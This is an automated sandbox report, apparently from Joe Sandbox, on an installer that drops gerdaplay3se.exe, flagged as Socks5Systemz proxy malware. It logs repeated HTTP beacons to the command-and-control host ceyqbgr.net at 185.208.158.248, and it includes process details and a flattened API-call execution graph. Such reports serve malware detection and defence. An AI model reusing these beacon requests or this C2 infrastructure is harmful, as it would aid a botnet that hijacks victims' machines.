                                                                                Sep 27, 2024 17:32:51.792768002 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:52.719605923 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:52 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                50192.168.2.657575185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:52.849694967 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:53.621285915 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                51192.168.2.657576185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:53.750183105 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:54.453270912 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:54 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                52192.168.2.657577185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:54.574004889 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:55.379906893 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:55 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                53192.168.2.657578185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:55.497025967 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:56.275300026 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                54192.168.2.657579185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:56.431134939 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:57.201956987 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                55192.168.2.657580185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:57.326319933 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:58.046159029 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:57 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                56192.168.2.657581185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:58.169636965 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:58.953360081 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:58 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                57192.168.2.657582185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:32:59.111211061 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:32:59.949852943 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:32:59 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                58192.168.2.657583185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:33:00.078115940 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:33:00.771852970 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:33:00 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                59192.168.2.657584185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:33:00.913867950 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:33:01.633050919 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:33:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                60192.168.2.657585185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:33:01.747680902 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:33:02.490453959 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:33:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                61192.168.2.657586185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:33:02.629847050 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:33:03.387306929 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:33:03 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                62192.168.2.657587185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:33:03.518883944 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:33:04.246556997 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:33:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:11:30:57
                                                                                Start date:27/09/2024
                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0x400000
                                                                                File size:3'298'104 bytes
                                                                                MD5 hash:5F3D49BFFED0DA5D969582BD92FED715
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:1
                                                                                Start time:11:30:57
                                                                                Start date:27/09/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-CJFRT.tmp\file.tmp" /SL5="$20434,3031792,56832,C:\Users\user\Desktop\file.exe"
                                                                                Imagebase:0x400000
                                                                                File size:708'608 bytes
                                                                                MD5 hash:499BD324F6DD0DF600B61BE36E26B612
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:3
                                                                                Start time:11:30:58
                                                                                Start date:27/09/2024
                                                                                Path:C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe" -i
                                                                                Imagebase:0x400000
                                                                                File size:3'264'512 bytes
                                                                                MD5 hash:D9BDC42F41BCE78D0C9D0FB3AC33D0DF
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.3371905613.0000000002721000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:21.3%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:2.4%
                                                                                  Total number of Nodes:1520
                                                                                  Total number of Limit Nodes:22
                                                                                  execution_graph 5447 407548 5448 407554 CloseHandle 5447->5448 5449 40755d 5447->5449 5448->5449 6684 402b48 RaiseException 5889 407749 5890 4076dc WriteFile 5889->5890 5895 407724 5889->5895 5891 4076e8 5890->5891 5892 4076ef 5890->5892 5893 40748c 35 API calls 5891->5893 5894 407700 5892->5894 5896 4073ec 34 API calls 5892->5896 5893->5892 5895->5889 5897 4077e0 5895->5897 5896->5894 5898 4078db InterlockedExchange 5897->5898 5900 407890 5897->5900 5899 4078e7 5898->5899 6685 40294a 6688 402952 6685->6688 6686 403554 4 API calls 6686->6688 6687 402967 6688->6686 6688->6687 6689 403f4a 6690 403f53 6689->6690 6691 403f5c 6689->6691 6693 403f07 6690->6693 6696 403f09 6693->6696 6695 403f3c 6695->6691 6697 403154 4 API calls 6696->6697 6699 403e9c 6696->6699 6702 403f3d 6696->6702 6716 403e9c 6696->6716 6697->6696 6698 403ef2 6701 402674 4 API calls 6698->6701 6699->6695 6699->6698 6704 403ea9 6699->6704 6707 403e8e 6699->6707 6706 403ecf 6701->6706 6702->6691 6705 402674 4 API calls 6704->6705 6704->6706 6705->6706 6706->6691 6708 403e4c 6707->6708 6709 403e62 6708->6709 6710 403e7b 6708->6710 6713 403e67 6708->6713 6712 403cc8 4 API calls 6709->6712 6711 402674 4 API calls 6710->6711 6714 403e78 6711->6714 6712->6713 6713->6714 6715 402674 4 API calls 6713->6715 6714->6698 6714->6704 6715->6714 6717 403ed7 6716->6717 6723 403ea9 6716->6723 6718 403ef2 6717->6718 6720 403e8e 4 API calls 6717->6720 6721 402674 4 API calls 6718->6721 6719 403ecf 6719->6696 6722 403ee6 6720->6722 6721->6719 6722->6718 6722->6723 6723->6719 6724 402674 4 API calls 6723->6724 6724->6719 6243 40ac4f 6244 40abc1 6243->6244 6245 4094d8 9 API calls 6244->6245 6247 40abed 6244->6247 6245->6247 6246 40ac06 6248 40ac1a 6246->6248 6249 40ac0f DestroyWindow 6246->6249 6247->6246 6250 40ac00 RemoveDirectoryA 6247->6250 6251 40ac42 6248->6251 6252 40357c 4 API calls 6248->6252 6249->6248 6250->6246 6253 40ac38 6252->6253 6254 4025ac 4 API calls 6253->6254 6254->6251 6255 403a52 6256 403a74 6255->6256 6257 403a5a WriteFile 6255->6257 6257->6256 6258 403a78 GetLastError 6257->6258 6258->6256 6259 402654 6260 403154 4 API calls 6259->6260 6261 402614 6260->6261 6262 402632 6261->6262 6263 403154 4 API calls 6261->6263 6263->6262 6264 40ac56 6265 40ac5d 6264->6265 6267 40ac88 6264->6267 6274 409448 6265->6274 6269 403198 4 API calls 6267->6269 6268 40ac62 6268->6267 6271 40ac80 MessageBoxA 6268->6271 6270 40acc0 6269->6270 6272 403198 4 API calls 6270->6272 6271->6267 6273 40acc8 6272->6273 6275 409454 GetCurrentProcess OpenProcessToken 6274->6275 6276 4094af ExitWindowsEx 6274->6276 6277 409466 6275->6277 6278 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6275->6278 6276->6277 6277->6268 6278->6276 6278->6277 6733 40995e 6734 409960 6733->6734 6735 40999e CallWindowProcA 6734->6735 6736 409982 6734->6736 6735->6736 6737 409960 6738 409982 6737->6738 6740 40996f 6737->6740 6739 40999e CallWindowProcA 6739->6738 6740->6738 6740->6739 6741 405160 6742 405173 6741->6742 6743 404e58 33 API calls 6742->6743 6744 405187 6743->6744 6279 402e64 6280 402e69 6279->6280 6281 402e7a RtlUnwind 6280->6281 6282 402e5e 6280->6282 6283 402e9d 6281->6283 5901 40766c SetFilePointer 5902 4076a3 5901->5902 5903 407693 GetLastError 5901->5903 5903->5902 5904 40769c 5903->5904 5905 40748c 35 API calls 5904->5905 5905->5902 6296 40667c IsDBCSLeadByte 6297 406694 6296->6297 6757 403f7d 6758 403fa2 6757->6758 6761 403f84 6757->6761 6760 403e8e 4 API calls 6758->6760 6758->6761 6759 403f8c 6760->6761 6761->6759 6762 402674 4 API calls 6761->6762 6763 403fca 6762->6763 6764 403d02 6766 403d12 6764->6766 6765 403ddf ExitProcess 6766->6765 6767 403db8 6766->6767 6769 403dea 6766->6769 6774 403da4 6766->6774 6775 403d8f MessageBoxA 6766->6775 6768 403cc8 4 API calls 6767->6768 6770 403dc2 6768->6770 6771 403cc8 4 API calls 6770->6771 6772 403dcc 6771->6772 6784 4019dc 6772->6784 6780 403fe4 6774->6780 6775->6767 6776 403dd1 6776->6765 6776->6769 6781 403fe8 6780->6781 6782 403f07 4 API calls 6781->6782 6783 404006 6782->6783 6785 401abb 6784->6785 6786 4019ed 6784->6786 6785->6776 6787 401a04 RtlEnterCriticalSection 6786->6787 6788 401a0e LocalFree 6786->6788 6787->6788 6789 401a41 6788->6789 6790 401a2f VirtualFree 6789->6790 6791 401a49 6789->6791 6790->6789 6792 401a70 LocalFree 6791->6792 6793 401a87 6791->6793 6792->6792 6792->6793 6794 401aa9 RtlDeleteCriticalSection 6793->6794 6795 401a9f RtlLeaveCriticalSection 6793->6795 6794->6776 6795->6794 6302 404206 6303 4041cc 6302->6303 6306 40420a 6302->6306 6304 403154 4 API calls 6307 404323 6304->6307 6305 404282 6306->6304 6306->6305 6308 402c08 6309 402c82 6308->6309 6312 402c19 6308->6312 6310 402c56 RtlUnwind 6311 403154 4 API calls 6310->6311 6311->6309 6312->6309 6312->6310 6315 402b28 6312->6315 6316 402b31 RaiseException 6315->6316 6317 402b47 6315->6317 6316->6317 6317->6310 6318 408c10 6319 408c17 6318->6319 6320 403198 4 API calls 6319->6320 6328 408cb1 6320->6328 6321 408cdc 6322 4031b8 4 API calls 6321->6322 6323 408d69 6322->6323 6324 408cc8 6326 4032fc 18 API calls 6324->6326 6325 403278 18 API calls 6325->6328 6326->6321 6327 4032fc 18 API calls 6327->6328 6328->6321 6328->6324 6328->6325 6328->6327 6333 40a814 6334 40a839 6333->6334 6335 40993c 29 API calls 6334->6335 6338 40a83e 6335->6338 6336 40a891 6367 4026c4 GetSystemTime 6336->6367 6338->6336 6341 408dd8 18 API calls 6338->6341 6339 40a896 6340 409330 46 API calls 6339->6340 6342 40a89e 6340->6342 6343 40a86d 6341->6343 6344 4031e8 18 API calls 6342->6344 6347 40a875 MessageBoxA 6343->6347 6345 40a8ab 6344->6345 6346 406928 19 API calls 6345->6346 6348 40a8b8 6346->6348 6347->6336 6349 40a882 6347->6349 6350 4066c0 19 API calls 6348->6350 6351 405864 19 API calls 6349->6351 6352 40a8c8 6350->6352 6351->6336 6353 406638 19 API calls 6352->6353 6354 40a8d9 6353->6354 6355 403340 18 API calls 6354->6355 6356 40a8e7 6355->6356 6357 4031e8 18 API calls 6356->6357 6358 40a8f7 6357->6358 6359 4074e0 37 API calls 6358->6359 6360 40a936 6359->6360 6361 402594 18 API calls 6360->6361 6362 40a956 6361->6362 6363 407a28 19 API calls 6362->6363 6364 40a998 6363->6364 6365 407cb8 35 API calls 6364->6365 6366 40a9bf 6365->6366 6367->6339 5445 407017 5446 407008 SetErrorMode 5445->5446 6368 403018 6369 403070 6368->6369 6370 403025 6368->6370 6371 40302a RtlUnwind 6370->6371 6372 40304e 6371->6372 6374 402f78 6372->6374 6375 402be8 6372->6375 6376 402bf1 RaiseException 6375->6376 6377 402c04 6375->6377 6376->6377 6377->6369 6382 40901e 6383 409010 6382->6383 6384 408fac Wow64RevertWow64FsRedirection 6383->6384 6385 409018 6384->6385 6386 409020 SetLastError 6387 409029 6386->6387 6402 403a28 ReadFile 6403 403a46 6402->6403 6404 403a49 GetLastError 6402->6404 5906 40762c ReadFile 5907 407663 5906->5907 5908 40764c 5906->5908 5909 407652 GetLastError 5908->5909 5910 40765c 5908->5910 5909->5907 5909->5910 5911 40748c 35 API calls 5910->5911 5911->5907 6806 40712e 6807 407118 6806->6807 6808 403198 4 API calls 6807->6808 6809 407120 6808->6809 6810 403198 4 API calls 6809->6810 6811 407128 6810->6811 5926 40a82f 5927 409ae8 18 API calls 5926->5927 5928 40a834 5927->5928 5929 40a839 5928->5929 5930 402f24 5 API calls 5928->5930 5963 40993c 5929->5963 5930->5929 5932 40a891 5968 4026c4 GetSystemTime 5932->5968 5934 40a83e 5934->5932 6029 408dd8 5934->6029 5935 40a896 5969 409330 5935->5969 5939 40a86d 5943 40a875 MessageBoxA 5939->5943 5940 4031e8 18 API calls 5941 40a8ab 5940->5941 5987 406928 5941->5987 5943->5932 5945 40a882 5943->5945 6032 405864 5945->6032 5950 40a8d9 6014 403340 5950->6014 5952 40a8e7 5953 4031e8 18 API calls 5952->5953 5954 40a8f7 5953->5954 5955 4074e0 37 API calls 5954->5955 5956 40a936 5955->5956 5957 402594 18 API calls 5956->5957 5958 40a956 5957->5958 5959 407a28 19 API calls 5958->5959 5960 40a998 5959->5960 5961 407cb8 35 API calls 5960->5961 5962 40a9bf 5961->5962 6036 40953c 5963->6036 5966 4098cc 19 API calls 5967 40995c 5966->5967 5967->5934 5968->5935 5978 409350 5969->5978 5972 409375 CreateDirectoryA 5973 4093ed 5972->5973 5974 40937f GetLastError 5972->5974 5975 40322c 4 API calls 5973->5975 5974->5978 5976 4093f7 5975->5976 5980 4031b8 4 API calls 5976->5980 5977 408dd8 18 API calls 5977->5978 5978->5972 5978->5977 5979 404c94 33 API calls 5978->5979 5982 407284 19 API calls 5978->5982 5985 408da8 18 API calls 5978->5985 5986 405890 18 API calls 5978->5986 6092 406cf4 5978->6092 6115 409224 5978->6115 5979->5978 5981 409411 5980->5981 5983 4031b8 4 API calls 5981->5983 5982->5978 5984 40941e 5983->5984 5984->5940 5985->5978 5986->5978 6221 406820 5987->6221 5990 403454 18 API calls 5991 40694a 5990->5991 5992 4066c0 5991->5992 6226 4068e4 5992->6226 5995 4066f0 5997 403340 18 API calls 5995->5997 5996 4066fe 5998 403454 18 API calls 5996->5998 5999 4066fc 5997->5999 